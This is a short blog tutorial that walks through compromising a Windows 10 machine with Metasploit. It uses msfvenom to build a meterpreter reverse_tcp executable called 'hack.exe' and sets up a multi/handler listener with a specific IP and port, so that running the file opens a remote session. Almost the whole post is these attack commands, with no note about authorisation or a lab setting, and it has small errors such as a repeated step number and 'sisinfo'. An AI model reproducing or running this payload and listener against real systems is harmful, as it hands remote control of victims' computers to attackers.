Exploiting Windows 10 using payload and reverse_tcp(Metasploit)

        Step 1:-

  • To get your IP address type the following command:
  • ifconfig 



         Step 2:-

  • Open terminal or Root terminal and type the following command :  
    msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<Enter your IP> -f exe > hack.exe
  • you can use any lport like lport=4444,lport=8000



        Step 3:-
  • Find the file to the main desktop using drag and drop

 

        Step 4:-
  • In the terminal type the following command :
  1.   msfconsole
  2.   use exploit/multi/handler
  3.   set payload windows/x64/meterpreter/reverse_tcp
  4.   set lhost 192.168.43.110
  5.   set lport 8080
  6.   exploit


        Step 5:-
  •  Run the file which we put on the main desktop then after you will see the new meterpreter session   open


        Step 5:-

  • Type help to get all commands 

        Step 6:-
  • Type sisinfo

                                        Review and comment will be appreciated 

                                        Thank you For your support 😃

Comments

Popular posts from this blog

What is TCP

What is reverse_tcp